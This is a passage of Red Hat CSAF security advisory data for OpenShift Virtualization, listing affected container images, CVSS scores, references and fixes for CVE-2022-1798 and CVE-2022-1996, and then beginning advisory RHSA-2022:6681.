"8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1996", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2022-06-08T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2094982", }, ], notes: [ { category: "description", text: "A flaw was found in CORS Filter feature from the go-restful package. When a user inputs a domain which is in AllowedDomains, all domains starting with the same pattern are accepted. This issue could allow an attacker to break the CORS policy by allowing any page to make requests and retrieve data on behalf of users.", title: "Vulnerability description", }, { category: "summary", text: "go-restful: Authorization Bypass Through User-Controlled Key", title: "Vulnerability summary", }, { category: "other", text: "The go-restful package is a transitive dependency which is being pulled with k8s.io/api and not directly being used anywhere in OpenShift Container Platform (OCP), OpenShift Container Storage, OpenShift Data Foundation, OpenShift Do and OpenShift Pipelines, hence these components are marked as 'Will not fix' or even \"Not affected\".", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], known_not_affected: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1996", }, { category: "external", summary: "RHBZ#2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1996", url: "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", }, ], release_date: "2022-06-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 9.1, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "go-restful: Authorization Bypass Through User-Controlled Key", }, ], }
rhsa-2022:6681
Vulnerability from csaf_redhat
Published
2022-09-22 08:16
Modified
2025-03-19 16:46
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.9.6 images:
RHEL-8-CNV-4.9
==============
cnv-must-gather-container-v4.9.6-7
kubevirt-template-validator-container-v4.9.6-6
kubevirt-ssp-operator-container-v4.9.6-5
virt-cdi-uploadserver-container-v4.9.6-4
virt-cdi-cloner-container-v4.9.6-4
virt-cdi-importer-container-v4.9.6-4
virt-cdi-uploadproxy-container-v4.9.6-4
virt-cdi-apiserver-container-v4.9.6-4
virt-cdi-controller-container-v4.9.6-4
virt-cdi-operator-container-v4.9.6-4
hostpath-provisioner-container-v4.9.6-3
hyperconverged-cluster-webhook-container-v4.9.6-3
hyperconverged-cluster-operator-container-v4.9.6-3
node-maintenance-operator-container-v4.9.6-4
kubevirt-vmware-container-v4.9.6-3
kubevirt-v2v-conversion-container-v4.9.6-3
ovs-cni-plugin-container-v4.9.6-3
cnv-containernetworking-plugins-container-v4.9.6-3
bridge-marker-container-v4.9.6-4
ovs-cni-marker-container-v4.9.6-3
kubemacpool-container-v4.9.6-4
kubernetes-nmstate-handler-container-v4.9.6-5
cluster-network-addons-operator-container-v4.9.6-5
virt-controller-container-v4.9.6-9
virt-handler-container-v4.9.6-9
virt-api-container-v4.9.6-9
virt-operator-container-v4.9.6-9
virt-artifacts-server-container-v4.9.6-9
virt-launcher-container-v4.9.6-9
libguestfs-tools-container-v4.9.6-9
virtio-win-container-v4.9.6-3
hostpath-provisioner-operator-container-v4.9.6-3
vm-import-operator-container-v4.9.6-3
vm-import-controller-container-v4.9.6-3
vm-import-virtv2v-container-v4.9.6-3
hco-bundle-registry-container-v4.9.6-51
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.9.6 images:\n\nRHEL-8-CNV-4.9\n==============\ncnv-must-gather-container-v4.9.6-7\nkubevirt-template-validator-container-v4.9.6-6\nkubevirt-ssp-operator-container-v4.9.6-5\nvirt-cdi-uploadserver-container-v4.9.6-4\nvirt-cdi-cloner-container-v4.9.6-4\nvirt-cdi-importer-container-v4.9.6-4\nvirt-cdi-uploadproxy-container-v4.9.6-4\nvirt-cdi-apiserver-container-v4.9.6-4\nvirt-cdi-controller-container-v4.9.6-4\nvirt-cdi-operator-container-v4.9.6-4\nhostpath-provisioner-container-v4.9.6-3\nhyperconverged-cluster-webhook-container-v4.9.6-3\nhyperconverged-cluster-operator-container-v4.9.6-3\nnode-maintenance-operator-container-v4.9.6-4\nkubevirt-vmware-container-v4.9.6-3\nkubevirt-v2v-conversion-container-v4.9.6-3\novs-cni-plugin-container-v4.9.6-3\ncnv-containernetworking-plugins-container-v4.9.6-3\nbridge-marker-container-v4.9.6-4\novs-cni-marker-container-v4.9.6-3\nkubemacpool-container-v4.9.6-4\nkubernetes-nmstate-handler-container-v4.9.6-5\ncluster-network-addons-operator-container-v4.9.6-5\nvirt-controller-container-v4.9.6-9\nvirt-handler-container-v4.9.6-9\nvirt-api-container-v4.9.6-9\nvirt-operator-container-v4.9.6-9\nvirt-artifacts-server-container-v4.9.6-9\nvirt-launcher-container-v4.9.6-9\nlibguestfs-tools-container-v4.9.6-9\nvirtio-win-container-v4.9.6-3\nhostpath-provisioner-operator-container-v4.9.6-3\nvm-import-operator-container-v4.9.6-3\nvm-import-controller-container-v4.9.6-3\nvm-import-virtv2v-container-v4.9.6-3\nhco-bundle-registry-container-v4.9.6-51\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6681", url: "https://access.redhat.com/errata/RHSA-2022:6681", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2092269", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092269", }, { category: "external", summary: "2097313", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097313", }, { category: "external", summary: "2101174", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101174", }, { category: "external", summary: "2110783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110783", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118317", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118317", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6681.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update", tracking: { current_release_date: "2025-03-19T16:46:12+00:00", generator: { date: "2025-03-19T16:46:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2022:6681", initial_release_date: "2022-09-22T08:16:30+00:00", revision_history: [ { date: "2022-09-22T08:16:30+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-22T08:16:30+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-19T16:46:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.9 for RHEL 8", product: { name: "CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.9::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.9.6-7", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.9.6-51", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_id: 